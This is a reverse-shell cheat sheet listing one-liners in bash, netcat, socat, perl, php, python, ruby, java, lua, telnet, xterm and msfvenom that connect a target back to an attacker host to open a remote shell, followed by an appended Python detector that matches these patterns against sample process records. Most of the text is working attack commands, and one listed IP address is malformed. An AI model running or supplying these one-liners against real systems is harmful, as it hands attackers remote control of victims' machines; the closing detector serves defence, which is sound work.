listen port
nc -lvnp 4444
nc -vvlp 4444
socat version
socat TCP-LISTEN:12345 -
socat reverse shell
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.31.174:12345
bash version
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
OR
bash -c 'sh -i &>/dev/tcp/210.28.30.887/53 0>&1'
perl version
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
php version
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
python version
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
NC version
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
ruby version
ruby -rsocket -e'f=TCPSocket.open("[ATTACKER-IP]",10000).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
java version
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
lua version
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
NC version without -e option
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc x.x.x.x 4444 1>/tmp/backpipe
/bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1
mknod backpipe p && telnet 173.214.173.151 8080 0<backpipe | /bin/bash 1>backpipe
mknod needs the root user, but you can also create the pipe with mkfifo /tmp/backpipe.
telnet version
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet [ATTACKER-IP] 10000 >/tmp/f
another bash reverse shell
exec 5<>/dev/tcp/[ATTACKER-IP]/10000;cat <&5 | while read line; do $line 2>&5 >&5; done
xterm version
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X server (:1, which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You'll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
msfvenom reverse shell
msfvenom -l payloads 'cmd/unix/reverse'
msfvenom -p cmd/unix/reverse_bash lhost=[ATTACKER-IP] lport=10000 R
msfvenom -p cmd/unix/reverse_netcat lhost=[ATTACKER-IP] lport=10000 R
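As an added defensive example (not part of this cheat sheet), the following Python detector applies command-line patterns derived from the one-liners above and, independently, flags an interactive shell whose stdin/stdout/stderr are bound to a socket, the footprint the dup2/exec variants leave even when the redirections never appear in argv. The process-table records and fd targets are constructed samples in the shape of /proc/<pid>/cmdline and readlink(/proc/<pid>/fd/N).

```python
import re
from typing import Dict, List, Tuple

# Command-line patterns derived from the one-liners on this page.
PATTERNS = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    ("netcat -e shell", re.compile(r"\bnc\b.*\s-e\s+/bin/(?:ba)?sh")),
    ("fifo piped into nc/telnet", re.compile(r"mk(?:fifo|nod)\s+\S+.*\|\s*(?:nc|telnet)\b")),
    ("socat exec with pty", re.compile(r"socat\b.*exec:.*,pty")),
    ("python dup2 socket shell", re.compile(r"python\S*\s+-c\s.*socket.*dup2.*/bin/sh")),
    ("perl/php/ruby socket shell", re.compile(r"(?:Socket;|fsockopen|TCPSocket\.open).*exec")),
    ("xterm display callback", re.compile(r"xterm\s+-display\s+\S+:\d+")),
]

def match_cmdline(cmdline: str) -> List[str]:
    """Labels of reverse-shell patterns present in one process command line."""
    return [label for label, rx in PATTERNS if rx.search(cmdline)]

def shell_stdio_on_socket(comm: str, fds: Dict[int, str]) -> bool:
    """True when an interactive shell has at least two of fd 0/1/2 on a socket.
    `fds` mirrors readlink() of /proc/<pid>/fd/N, e.g. {0: 'socket:[40001]'}."""
    if comm not in ("sh", "bash", "dash", "zsh"):
        return False
    return sum(fds.get(n, "").startswith("socket:") for n in (0, 1, 2)) >= 2

Record = Tuple[int, str, str, Dict[int, str]]  # (pid, comm, cmdline, fds)

def scan(records: List[Record]) -> List[Tuple[int, List[str]]]:
    """Return (pid, reasons) for every record that trips a pattern or the fd check."""
    hits = []
    for pid, comm, cmdline, fds in records:
        reasons = match_cmdline(cmdline)
        if shell_stdio_on_socket(comm, fds):
            reasons.append("shell stdio bound to socket")
        if reasons:
            hits.append((pid, reasons))
    return hits

# Constructed sample process table (not real telemetry).
SOCK = {0: "socket:[40001]", 1: "socket:[40001]", 2: "socket:[40001]"}
TTY = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}
SAMPLE: List[Record] = [
    (101, "bash", "bash -i", SOCK),  # redirections are not in argv; only the fd check sees this
    (102, "sh", "/bin/sh -i", {0: "/tmp/f", 1: "pipe:[5001]", 2: "pipe:[5001]"}),  # fifo child: no socket fd
    (103, "nc", "nc 10.0.0.1 1234 -e /bin/sh", TTY),
    (104, "python3", "python3 -m http.server 8000", TTY),  # benign listener, must not trip
    (105, "bash", "bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f'", TTY),
]
```

The fifo variant (pid 102/105) shows why both checks are needed: the child shell's stdio is a FIFO and a pipe, not a socket, so it is only caught through the launching command line.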